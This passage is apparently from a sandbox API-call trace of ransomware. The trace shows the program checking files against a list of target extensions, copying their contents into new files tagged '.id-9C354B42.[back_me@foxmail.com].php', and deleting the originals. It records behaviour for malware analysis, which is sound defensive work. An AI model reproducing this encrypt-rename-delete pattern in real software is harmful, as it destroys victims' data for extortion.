Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0041.790] lstrlenW (lpString=".doc") returned 4 [0041.790] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.790] lstrlenW (lpString=".docx") returned 5 [0041.790] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.790] lstrlenW (lpString=".pdf") returned 4 [0041.791] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.791] lstrlenW (lpString=".xls") returned 4 [0041.791] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.791] lstrlenW (lpString=".xlsx") returned 5 [0041.791] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.791] lstrlenW (lpString=".ppt") returned 4 [0041.791] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0041.791] lstrlenW (lpString=".zip") returned 4 [0041.791] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.791] lstrlenW (lpString=".rar") returned 4 [0041.791] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.791] lstrlenW (lpString=".bz2") returned 4 [0041.791] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.791] lstrlenW (lpString=".7z") returned 3 [0041.791] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0041.791] lstrlenW (lpString=".dbf") returned 4 [0041.791] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0041.791] lstrlenW (lpString=".1cd") returned 4 [0041.791] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0041.791] lstrlenW (lpString=".jpg") returned 4 [0041.791] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0041.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0041.791] lstrlenW (lpString=".doc") returned 4 [0041.792] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.792] lstrlenW (lpString=".docx") returned 5 [0041.792] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.792] lstrlenW (lpString=".pdf") returned 4 [0041.792] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.792] lstrlenW (lpString=".xls") returned 4 [0041.792] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.792] lstrlenW (lpString=".xlsx") returned 5 [0041.792] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.792] lstrlenW (lpString=".ppt") returned 4 [0041.792] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0041.792] lstrlenW (lpString=".zip") returned 4 [0041.792] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.792] lstrlenW (lpString=".rar") returned 4 [0041.792] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.792] lstrlenW (lpString=".bz2") returned 4 [0041.792] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.792] lstrlenW (lpString=".7z") returned 3 [0041.792] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0041.792] lstrlenW (lpString=".dbf") returned 4 [0041.792] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0041.792] lstrlenW (lpString=".1cd") returned 4 [0041.792] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0041.792] lstrlenW (lpString=".jpg") returned 4 [0041.792] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.793] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0041.793] lstrlenW (lpString="SETUP.XML") returned 9 [0041.793] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.793] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1872) returned 1 [0041.793] CloseHandle (hObject=0x1b0) returned 1 [0041.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml")) returned 0x20 [0041.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.793] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.794] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.794] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.794] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0042.273] GetLastError () returned 0x0 [0042.273] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x750, lpOverlapped=0x0) returned 1 [0042.274] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x760, lpOverlapped=0x0) returned 1 [0042.275] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.275] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.275] SetEndOfFile (hFile=0x1a8) returned 1 [0042.275] CloseHandle (hObject=0x1a8) returned 1 [0042.276] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.276] SetEndOfFile (hFile=0x1b0) returned 1 [0042.277] CloseHandle (hObject=0x1b0) returned 1 [0042.277] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.277] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml")) returned 1 [0042.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0042.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0042.277] lstrlenW (lpString=".doc") returned 4 [0042.278] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.278] lstrlenW (lpString=".docx") returned 5 [0042.278] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.278] lstrlenW (lpString=".pdf") returned 4 [0042.278] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.278] lstrlenW (lpString=".xls") returned 4 [0042.278] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.278] lstrlenW (lpString=".xlsx") returned 5 [0042.278] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.278] lstrlenW (lpString=".ppt") returned 4 [0042.278] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0042.278] lstrlenW (lpString=".zip") returned 4 [0042.278] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.278] lstrlenW (lpString=".rar") returned 4 [0042.278] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.278] lstrlenW (lpString=".bz2") returned 4 [0042.278] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.278] lstrlenW (lpString=".7z") returned 3 [0042.278] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0042.278] lstrlenW (lpString=".dbf") returned 4 [0042.278] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0042.278] lstrlenW (lpString=".1cd") returned 4 [0042.278] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0042.279] lstrlenW (lpString=".jpg") returned 4 [0042.279] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0042.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0042.279] lstrlenW (lpString=".doc") returned 4 [0042.279] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.279] lstrlenW (lpString=".docx") returned 5 [0042.279] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.279] lstrlenW (lpString=".pdf") returned 4 [0042.279] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.279] lstrlenW (lpString=".xls") returned 4 [0042.279] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.279] lstrlenW (lpString=".xlsx") returned 5 [0042.279] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.279] lstrlenW (lpString=".ppt") returned 4 [0042.279] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0042.279] lstrlenW (lpString=".zip") returned 4 [0042.279] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.279] lstrlenW (lpString=".rar") returned 4 [0042.279] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.279] lstrlenW (lpString=".bz2") returned 4 [0042.279] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.279] lstrlenW (lpString=".7z") returned 3 [0042.279] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0042.279] lstrlenW (lpString=".dbf") returned 4 [0042.279] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0042.279] lstrlenW (lpString=".1cd") returned 4 [0042.280] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0042.280] lstrlenW (lpString=".jpg") returned 4 [0042.280] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.280] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.280] lstrlenW (lpString="SETUP.XML") returned 9 [0042.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0042.281] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=20577) returned 1 [0042.281] CloseHandle (hObject=0x1b0) returned 1 [0042.281] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml")) returned 0x20 [0042.281] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.281] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0042.281] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.281] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.281] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0042.282] GetLastError () returned 0x0 [0042.282] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x5061, lpOverlapped=0x0) returned 1 [0042.283] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x5070, lpOverlapped=0x0) returned 1 [0042.285] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.285] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.285] SetEndOfFile (hFile=0x1a8) returned 1 [0042.285] CloseHandle (hObject=0x1a8) returned 1 [0042.286] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.286] SetEndOfFile (hFile=0x1b0) returned 1 [0042.287] CloseHandle (hObject=0x1b0) returned 1 [0042.287] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.287] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml")) returned 1 [0042.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0042.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0042.287] lstrlenW (lpString=".doc") returned 4 [0042.287] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.287] lstrlenW (lpString=".docx") returned 5 [0042.287] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.287] lstrlenW (lpString=".pdf") returned 4 [0042.287] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.287] lstrlenW (lpString=".xls") returned 4 [0042.287] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.287] lstrlenW (lpString=".xlsx") returned 5 [0042.287] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.287] lstrlenW (lpString=".ppt") returned 4 [0042.288] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0042.288] lstrlenW (lpString=".zip") returned 4 [0042.288] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.288] lstrlenW (lpString=".rar") returned 4 [0042.288] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.288] lstrlenW (lpString=".bz2") returned 4 [0042.288] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.288] lstrlenW (lpString=".7z") returned 3 [0042.288] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0042.288] lstrlenW (lpString=".dbf") returned 4 [0042.288] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0042.288] lstrlenW (lpString=".1cd") returned 4 [0042.288] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0042.288] lstrlenW (lpString=".jpg") returned 4 [0042.288] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0042.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0042.288] lstrlenW (lpString=".doc") returned 4 [0042.288] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.288] lstrlenW (lpString=".docx") returned 5 [0042.288] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.288] lstrlenW (lpString=".pdf") returned 4 [0042.288] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.288] lstrlenW (lpString=".xls") returned 4 [0042.288] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.288] lstrlenW (lpString=".xlsx") returned 5 [0042.288] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.289] lstrlenW (lpString=".ppt") returned 4 [0042.289] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0042.289] lstrlenW (lpString=".zip") returned 4 [0042.289] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.289] lstrlenW (lpString=".rar") returned 4 [0042.289] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.289] lstrlenW (lpString=".bz2") returned 4 [0042.289] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.289] lstrlenW (lpString=".7z") returned 3 [0042.289] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0042.289] lstrlenW (lpString=".dbf") returned 4 [0042.289] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0042.289] lstrlenW (lpString=".1cd") returned 4 [0042.289] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0042.289] lstrlenW (lpString=".jpg") returned 4 [0042.289] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.289] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.289] lstrlenW (lpString="VisiorWW.XML") returned 12 [0042.289] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0042.290] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=8723) returned 1 [0042.290] CloseHandle (hObject=0x1b0) returned 1 [0042.290] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml")) returned 0x20 [0042.290] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.290] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0042.290] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.290] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.290] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0042.292] GetLastError () returned 0x0 [0042.292] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x2213, lpOverlapped=0x0) returned 1 [0042.295] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x2220, lpOverlapped=0x0) returned 1 [0042.296] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.296] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0042.296] SetEndOfFile (hFile=0x1a8) returned 1 [0042.296] CloseHandle (hObject=0x1a8) returned 1 [0042.297] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, 